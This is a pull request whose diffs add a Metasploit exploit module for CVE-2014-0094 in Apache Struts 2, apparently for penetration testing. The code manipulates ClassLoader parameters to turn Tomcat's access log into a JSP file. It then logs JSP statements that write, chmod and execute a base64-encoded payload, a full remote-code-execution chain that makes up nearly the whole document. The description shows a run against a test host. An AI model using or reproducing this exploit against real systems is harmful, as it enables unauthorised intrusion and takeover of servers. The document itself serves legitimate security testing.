### PR TITLE
Add CVE-2014-0094 RCE for Struts 2

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -14,28 +14,26 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Apache Struts ParametersInterceptor Remote Code Execution',
+      'Name'           => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
       'Description'    => %q{
         This module exploits a remote command execution vulnerability in Apache Struts
-        versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
-        for the use of parentheses which in turn allows it to interpret parameter values as
-        OGNL expressions during certain exception handling for mismatched data types of
-        properties which allows remote attackers to execute arbitrary Java code via a
-        crafted parameter.
+        versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows
+        access to 'class' parameter which is directly mapped to getClass() method and
+        allows ClassLoader manipulation, which allows remote attackers to execute arbitrary
+        Java code via crafted parameters.
       },
       'Author'         =>
         [
-          'Meder Kydyraliev', # Vulnerability Discovery and PoC
-          'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
-          'mihi' #ARCH_JAVA support
+          'Mark Thomas and Przemyslaw Celej', # Vulnerability Discovery
+          'Alvaro Munoz', # PoC
+          'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2011-3923'],
-          [ 'OSVDB', '78501'],
-          [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],
-          [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']
+          [ 'CVE', '2014-0094'],
+          [ 'URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
+          [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
         ],
       'Platform'      => %w{ java linux win },
       'Privileged'     => true,
@@ -60,184 +58,86 @@ class Metasploit3 < Msf::Exploit::Remote
             },
           ]
         ],
-      'DisclosureDate' => 'Oct 01 2011',
+      'DisclosureDate' => 'Mar 06 2014',
       'DefaultTarget' => 2))
 
       register_options(
         [
           Opt::RPORT(8080),
-          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
-          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/hello_world/hello.action?INJECT"]),
-          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/hello_world/hello.action"])
     ], self.class)
   end
 
-  def execute_command(cmd, opts = {})
-=begin
-    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
-    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
-    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
-    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
-    uri = String.new(datastore['TARGETURI'])
-    uri = normalize_uri(uri)
-    uri.gsub!(/INJECT/,inject) # append the injection string
+
+  def exec_cmd(uri, cmd = "")
     resp = send_request_cgi({
-      'uri'     => uri,
-      'version' => '1.1',
-      'method'  => 'GET',
-    })
-    return resp #Used for check function.
-=end
-
-    inject = "class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT"
-    uri = String.new(datastore['TARGETURI'])
-    uri = normalize_uri(uri)
-
-    uri.gsub!(/INJECT/,inject) # append the injection string
-
-
-    resp = send_request_cgi({
-            'uri'     => uri,
+            'uri'     => uri+cmd,
             'version' => '1.1',
             'method'  => 'GET',
     })
 
-
-    inject = "class['classLoader'].resources.context.parent.pipeline.first.prefix=shell"
-    uri = String.new(datastore['TARGETURI'])
-    uri = normalize_uri(uri)
-
-    uri.gsub!(/INJECT/,inject) # append the injection string
-
-
-    resp = send_request_cgi({
-                                    'uri'     => uri,
-                                    'version' => '1.1',
-                                    'method'  => 'GET',
-                            })
-
-    inject = "class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp"
-    uri = String.new(datastore['TARGETURI'])
-    uri = normalize_uri(uri)
-
-    uri.gsub!(/INJECT/,inject) # append the injection string
-
-
-    resp = send_request_cgi({
-                                    'uri'     => uri,
-                                    'version' => '1.1',
-                                    'method'  => 'GET',
-                            })
-
-
-    inject = "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=1"
-    uri = String.new(datastore['TARGETURI'])
-    uri = normalize_uri(uri)
-
-    uri.gsub!(/INJECT/,inject) # append the injection string
-
-
-    resp = send_request_cgi({
-                                    'uri'     => uri,
-                                    'version' => '1.1',
-                                    'method'  => 'GET',
-                            })
-
-
-
-    uri = "/hello_world/echo.jsp?a=<% Runtime.getRuntime().exec("/usr/bin/gnome-terminal"); %>"
-    uri = normalize_uri(uri)
-
-
-    resp = send_request_cgi({
-                                    'uri'     => uri,
-                                    'version' => '1.1',
-                                    'method'  => 'GET',
-                            })
-
-
-
-
     return resp
+  end
 
+
+  def peer
+    "#{rhost}:#{rport}"
   end
 
   def exploit
-=begin
-    #Set up generic values.
-    @payload_exe = rand_text_alphanumeric(4+rand(4))
-    pl_exe = generate_payload_exe
-    append = 'false'
-    #Now arch specific...
-    case target['Platform']
-    when 'linux'
-      @payload_exe = "/tmp/#{@payload_exe}"
-      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
-    when 'java'
-      @payload_exe << ".jar"
-      pl_exe = payload.encoded_jar.pack
-      exec_cmd = ""
-      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
-      exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
-      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
-      exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
-      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
-      exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
-      exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
-      exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
-    when 'windows'
-      @payload_exe = "./#{@payload_exe}.exe"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
-    else
-      fail_with(Failure::NoTarget, 'Unsupported target platform!')
-    end
 
-    #Now with all the arch specific stuff set, perform the upload.
-    #109 = length of command string plus the max length of append.
-    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
-    chunk_length = 2048 - sub_from_chunk
-    chunk_length = ((chunk_length/4).floor)*3
-    while pl_exe.length > chunk_length
-      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
-      pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
-      append = true
-    end
-    java_upload_part(pl_exe,@payload_exe,append)
-    execute_command(chmod_cmd) if target['Platform'] == 'linux'
-    execute_command(exec_cmd)
-    register_files_for_cleanup(@payload_exe)
-=end
+    prefix_jsp = rand_text_alphanumeric(3+rand(3))
+    date_format = rand_text_numeric(1+rand(4))
 
-    execute_command("a")
+    vprint_status("#{peer} - Modifying class loader")
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT")
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}")
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp")
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}")
 
-  end
+    jsp_file = prefix_jsp
+    jsp_file << date_format
+    jsp_file << ".jsp"
 
-  def java_upload_part(part, filename, append = 'false')
-    cmd = ""
-    cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
-    cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
-    cmd << "#f.close()"
-    execute_command(cmd)
-  end
+    vprint_status("#{peer} - created file at http://#{peer}/#{jsp_file}")
 
-  def check
-    sleep_time = datastore['CHECK_SLEEPTIME']
-    check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
-    t1 = Time.now
-    vprint_status("Asking remote server to sleep for #{sleep_time} seconds")
-    response = execute_command(check_cmd)
-    t2 = Time.now
-    delta = t2 - t1
+    sleep(3)
+
+    uri = String.new(datastore['TARGETURI'])
+    uri << rand_text_alphanumeric(4+rand(4))
+    uri << "?"
+    uri << rand_text_alphanumeric(1+rand(1))
+    uri << "="
 
 
-    if response.nil?
-      return Exploit::CheckCode::Safe
-    elsif delta < sleep_time
-      return Exploit::CheckCode::Safe
-    else
-      return Exploit::CheckCode::Appears
-    end
+    payload_exe = generate_payload_exe
+
+    payload_file = rand_text_alphanumeric(4+rand(4))
+    register_files_for_cleanup("#{payload_file}", "#{jsp_file}")
+
+    exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>")
+    exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>")
+    exec_cmd(uri, "<%@ page import=\"java.io.File\" %>")
+
+    exec_cmd(uri, "<% FileOutputStream oFile = new FileOutputStream(\"#{payload_file}\", false); %>")
+    exec_cmd(uri, "<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(payload_exe)}\")); %>")
+    exec_cmd(uri, "<% oFile.flush(); %>")
+    exec_cmd(uri, "<% oFile.close(); %>")
+    exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>")
+    exec_cmd(uri, "<% f.setExecutable(true); %>")
+    exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>")
+
+    vprint_status("#{peer} - Waiting 10 seconds...")
+
+    sleep(10)
+
+    vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}")
+
+    uri = "/"
+    uri << jsp_file
+
+    exec_cmd(uri)
+
   end
 
 end

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -33,17 +33,18 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'CVE', '2014-0094'],
+          [ 'CVE', '2014-0112'],
           [ 'URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
           [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
         ],
-      'Platform'      => %w{ java linux win },
+      'Platform'      => %w{ linux win },
       'Privileged'     => true,
       'Targets'        =>
         [
           ['Windows Universal',
             {
               'Arch' => ARCH_X86,
-              'Platform' => 'windows'
+              'Platform' => 'w'
             }
           ],
           ['Linux Universal',
@@ -55,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Java Universal',
             {
               'Arch' => ARCH_JAVA,
-              'Platform' => 'java'
+              'Platform' => ['win','linux']
             },
           ]
         ],
@@ -81,6 +82,11 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
 
+  def is_log_flushed(resp, content)
+    return (resp.headers["Content-Length"] != "0") && (resp.body =~ /#{content}/)
+  end
+
+
   def exploit
 
     prefix_jsp = rand_text_alphanumeric(3+rand(3))
@@ -98,22 +104,54 @@ class Metasploit3 < Msf::Exploit::Remote
     jsp_file << date_format
     jsp_file << ".jsp"
 
-    vprint_status("#{peer} - created file at http://#{peer}/#{jsp_file}")
+    # Wait till the log is created
+    uri = "/"
+    uri << jsp_file
 
-    Rex.sleep(3)
+    created = false
+
+    print_status("#{peer} - Waiting for the server to create the logfile")
+
+    10.times do |x|
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger payload
+      vprint_status("#{peer} - Countdown #{10-x}...")
+      res = exec_cmd(uri)
+      # Failure. The request timed out or the server went away.
+      if res.nil?
+        print_error("#{peer} - Not received response")
+        return
+      end
+      # Success if the server has flushed all the sent commands to the jsp file
+      if res.code == 200
+        vprint_good("#{peer} - created file at http://#{peer}/#{jsp_file}")
+        created = true
+        break
+      end
+    end
+
+    unless created
+      print_error("#{peer} - No log file was created")
+      return
+    end
+
+
+    if target['Arch'] == ARCH_JAVA
+      payload_exe = payload.encoded
+    else
+      payload_exe = generate_payload_exe
+    end
+
+    payload_file = rand_text_alphanumeric(4+rand(4))
+    payload_file << ".jsp" if (target['Arch'] == ARCH_JAVA)
+    register_files_for_cleanup("#{payload_file}", "#{jsp_file}")
 
     # Inexistent URI that logs on previously created log file (with ".jsp" suffix)
     uri = String.new(datastore['TARGETURI'])
-    uri << rand_text_alphanumeric(4+rand(4))
-    uri << "?"
-    uri << rand_text_alphanumeric(1+rand(1))
-    uri << "="
+    uri << payload_file
 
-
-    payload_exe = generate_payload_exe
-
-    payload_file = rand_text_alphanumeric(4+rand(4))
-    register_files_for_cleanup("#{payload_file}", "#{jsp_file}")
+    vprint_status("#{peer} - Dumping payload into the logfile")
 
     # Commands to be logged
     exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>")
@@ -124,21 +162,44 @@ class Metasploit3 < Msf::Exploit::Remote
     exec_cmd(uri, "<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(payload_exe)}\")); %>")
     exec_cmd(uri, "<% oFile.flush(); %>")
     exec_cmd(uri, "<% oFile.close(); %>")
-    exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>")
-    exec_cmd(uri, "<% f.setExecutable(true); %>")
-    exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>")
 
-    vprint_status("#{peer} - Waiting 10 seconds...")
+    if target['Arch'] != ARCH_JAVA
+      exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>")
+      exec_cmd(uri, "<% f.setExecutable(true); %>")
+      exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>")
+    end
 
-    Rex.sleep(10)
-
-    vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}")
-
-    # Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences
     uri = "/"
     uri << jsp_file
 
-    exec_cmd(uri)
+    flushed = false
+
+    print_status("#{peer} - Waiting for the server to flush the logfile")
+
+    10.times do |x|
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger payload
+      vprint_status("#{peer} - Countdown #{10-x}...")
+      res = exec_cmd(uri)
+      # Failure. The request timed out or the server went away.
+      if res.nil?
+        print_error("#{peer} - Not received response")
+        return
+      end
+      # Success if the server has flushed all the sent commands to the jsp file
+      if res.code == 200 && is_log_flushed(res, payload_file)
+        flushed = true
+        break
+      end
+    end
+
+    unless flushed
+      print_error("#{peer} - Log not flushed on time")
+      return
+    end
+
+    exec_cmd("/#{payload_file}") if (target['Arch'] == ARCH_JAVA)
 
   end
 

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -90,10 +90,12 @@ class Metasploit3 < Msf::Exploit::Remote
     date_format = rand_text_numeric(1+rand(4))
 
     vprint_status("#{peer} - Modifying class loader")
-    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT")
-    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}")
-    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp")
-    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}")
+
+    # Modifies classLoader parameters
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix"
 
     jsp_file = prefix_jsp
     jsp_file << date_format
@@ -103,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     sleep(3)
 
+    # Inexistent URI that logs on previously created log file (with ".jsp" suffix) 
     uri = String.new(datastore['TARGETURI'])
     uri << rand_text_alphanumeric(4+rand(4))
     uri << "?"
@@ -115,6 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
     payload_file = rand_text_alphanumeric(4+rand(4))
     register_files_for_cleanup("#{payload_file}", "#{jsp_file}")
 
+    # Commands to be logged
     exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>")
     exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>")
     exec_cmd(uri, "<%@ page import=\"java.io.File\" %>")
@@ -133,6 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}")
 
+    # Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences
     uri = "/"
     uri << jsp_file
 

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
           ['Windows Universal',
             {
               'Arch' => ARCH_X86,
-              'Platform' => 'w'
+              'Platform' => 'win'
             }
           ],
           ['Linux Universal',
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
               'Platform' => 'linux'
             }
           ],
-          [ 'Java Universal',
+          ['Java Universal',
             {
               'Arch' => ARCH_JAVA,
               'Platform' => ['win','linux']

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -118,11 +118,10 @@ class Metasploit3 < Msf::Exploit::Remote
       # Now make a request to trigger payload
       vprint_status("#{peer} - Countdown #{10-x}...")
       res = exec_cmd(uri)
+
       # Failure. The request timed out or the server went away.
-      if res.nil?
-        print_error("#{peer} - Not received response")
-        return
-      end
+      fail_with(Failure::TimeoutExpired, "Not received response") if res.nil?
+
       # Success if the server has flushed all the sent commands to the jsp file
       if res.code == 200
         vprint_good("#{peer} - created file at http://#{peer}/#{jsp_file}")
@@ -131,11 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    unless created
-      print_error("#{peer} - No log file was created")
-      return
-    end
-
+    fail_with(Failure::TimeoutExpired, "No log file was created") unless created
 
     if target['Arch'] == ARCH_JAVA
       payload_exe = payload.encoded
@@ -182,11 +177,10 @@ class Metasploit3 < Msf::Exploit::Remote
       # Now make a request to trigger payload
       vprint_status("#{peer} - Countdown #{10-x}...")
       res = exec_cmd(uri)
+
       # Failure. The request timed out or the server went away.
-      if res.nil?
-        print_error("#{peer} - Not received response")
-        return
-      end
+      fail_with(Failure::TimeoutExpired, "Not received response") if res.nil?
+
       # Success if the server has flushed all the sent commands to the jsp file
       if res.code == 200 && is_log_flushed(res, payload_file)
         flushed = true
@@ -194,10 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    unless flushed
-      print_error("#{peer} - Log not flushed on time")
-      return
-    end
+    fail_with(Failure::TimeoutExpired, "Log not flushed on time") unless flushed
 
     exec_cmd("/#{payload_file}") if (target['Arch'] == ARCH_JAVA)
 

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -1,0 +1,244 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts ParametersInterceptor Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a remote command execution vulnerability in Apache Struts
+        versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
+        for the use of parentheses which in turn allows it to interpret parameter values as
+        OGNL expressions during certain exception handling for mismatched data types of
+        properties which allows remote attackers to execute arbitrary Java code via a
+        crafted parameter.
+      },
+      'Author'         =>
+        [
+          'Meder Kydyraliev', # Vulnerability Discovery and PoC
+          'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
+          'mihi' #ARCH_JAVA support
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2011-3923'],
+          [ 'OSVDB', '78501'],
+          [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],
+          [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']
+        ],
+      'Platform'      => %w{ java linux win },
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          ['Windows Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'windows'
+            }
+          ],
+          ['Linux Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
+            }
+          ],
+          [ 'Java Universal',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'java'
+            },
+          ]
+        ],
+      'DisclosureDate' => 'Oct 01 2011',
+      'DefaultTarget' => 2))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/hello_world/hello.action?INJECT"]),
+          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
+    ], self.class)
+  end
+
+  def execute_command(cmd, opts = {})
+=begin
+    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
+    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
+    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
+    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
+    uri = String.new(datastore['TARGETURI'])
+    uri = normalize_uri(uri)
+    uri.gsub!(/INJECT/,inject) # append the injection string
+    resp = send_request_cgi({
+      'uri'     => uri,
+      'version' => '1.1',
+      'method'  => 'GET',
+    })
+    return resp #Used for check function.
+=end
+
+    inject = "class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT"
+    uri = String.new(datastore['TARGETURI'])
+    uri = normalize_uri(uri)
+
+    uri.gsub!(/INJECT/,inject) # append the injection string
+
+
+    resp = send_request_cgi({
+            'uri'     => uri,
+            'version' => '1.1',
+            'method'  => 'GET',
+    })
+
+
+    inject = "class['classLoader'].resources.context.parent.pipeline.first.prefix=shell"
+    uri = String.new(datastore['TARGETURI'])
+    uri = normalize_uri(uri)
+
+    uri.gsub!(/INJECT/,inject) # append the injection string
+
+
+    resp = send_request_cgi({
+                                    'uri'     => uri,
+                                    'version' => '1.1',
+                                    'method'  => 'GET',
+                            })
+
+    inject = "class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp"
+    uri = String.new(datastore['TARGETURI'])
+    uri = normalize_uri(uri)
+
+    uri.gsub!(/INJECT/,inject) # append the injection string
+
+
+    resp = send_request_cgi({
+                                    'uri'     => uri,
+                                    'version' => '1.1',
+                                    'method'  => 'GET',
+                            })
+
+
+    inject = "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=1"
+    uri = String.new(datastore['TARGETURI'])
+    uri = normalize_uri(uri)
+
+    uri.gsub!(/INJECT/,inject) # append the injection string
+
+
+    resp = send_request_cgi({
+                                    'uri'     => uri,
+                                    'version' => '1.1',
+                                    'method'  => 'GET',
+                            })
+
+
+
+    uri = "/hello_world/echo.jsp?a=<% Runtime.getRuntime().exec("/usr/bin/gnome-terminal"); %>"
+    uri = normalize_uri(uri)
+
+
+    resp = send_request_cgi({
+                                    'uri'     => uri,
+                                    'version' => '1.1',
+                                    'method'  => 'GET',
+                            })
+
+
+
+
+    return resp
+
+  end
+
+  def exploit
+=begin
+    #Set up generic values.
+    @payload_exe = rand_text_alphanumeric(4+rand(4))
+    pl_exe = generate_payload_exe
+    append = 'false'
+    #Now arch specific...
+    case target['Platform']
+    when 'linux'
+      @payload_exe = "/tmp/#{@payload_exe}"
+      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
+    when 'java'
+      @payload_exe << ".jar"
+      pl_exe = payload.encoded_jar.pack
+      exec_cmd = ""
+      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
+      exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
+      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
+      exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
+      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
+      exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
+      exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
+      exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
+    when 'windows'
+      @payload_exe = "./#{@payload_exe}.exe"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
+    else
+      fail_with(Failure::NoTarget, 'Unsupported target platform!')
+    end
+
+    #Now with all the arch specific stuff set, perform the upload.
+    #109 = length of command string plus the max length of append.
+    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
+    chunk_length = 2048 - sub_from_chunk
+    chunk_length = ((chunk_length/4).floor)*3
+    while pl_exe.length > chunk_length
+      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
+      pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
+      append = true
+    end
+    java_upload_part(pl_exe,@payload_exe,append)
+    execute_command(chmod_cmd) if target['Platform'] == 'linux'
+    execute_command(exec_cmd)
+    register_files_for_cleanup(@payload_exe)
+=end
+
+    execute_command("a")
+
+  end
+
+  def java_upload_part(part, filename, append = 'false')
+    cmd = ""
+    cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
+    cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
+    cmd << "#f.close()"
+    execute_command(cmd)
+  end
+
+  def check
+    sleep_time = datastore['CHECK_SLEEPTIME']
+    check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
+    t1 = Time.now
+    vprint_status("Asking remote server to sleep for #{sleep_time} seconds")
+    response = execute_command(check_cmd)
+    t2 = Time.now
+    delta = t2 - t1
+
+
+    if response.nil?
+      return Exploit::CheckCode::Safe
+    elsif delta < sleep_time
+      return Exploit::CheckCode::Safe
+    else
+      return Exploit::CheckCode::Appears
+    end
+  end
+
+end
+

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -24,8 +24,9 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Mark Thomas and Przemyslaw Celej', # Vulnerability Discovery
-          'Alvaro Munoz', # PoC
+          'Mark Thomas', # Vulnerability Discovery
+          'Przemyslaw Celej', # Vulnerability Discovery
+          'pwntester <alvaro[at]pwntester.com>', # PoC
           'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
         ],
       'License'        => MSF_LICENSE,
@@ -80,10 +81,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
 
-  def peer
-    "#{rhost}:#{rport}"
-  end
-
   def exploit
 
     prefix_jsp = rand_text_alphanumeric(3+rand(3))
@@ -103,9 +100,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("#{peer} - created file at http://#{peer}/#{jsp_file}")
 
-    sleep(3)
+    Rex.sleep(3)
 
-    # Inexistent URI that logs on previously created log file (with ".jsp" suffix) 
+    # Inexistent URI that logs on previously created log file (with ".jsp" suffix)
     uri = String.new(datastore['TARGETURI'])
     uri << rand_text_alphanumeric(4+rand(4))
     uri << "?"
@@ -133,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("#{peer} - Waiting 10 seconds...")
 
-    sleep(10)
+    Rex.sleep(10)
 
     vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}")
 


### PR DESCRIPTION
Tested on Ubuntu 12.04 x86 with Tomcat 8.0.5 and Java 7, using targets "linux" and "java".

```
msf exploit(struts_code_exec_classloader) > rerun
[*] Reloading module...

[*] 172.16.218.152:8080 - Modifying class loader
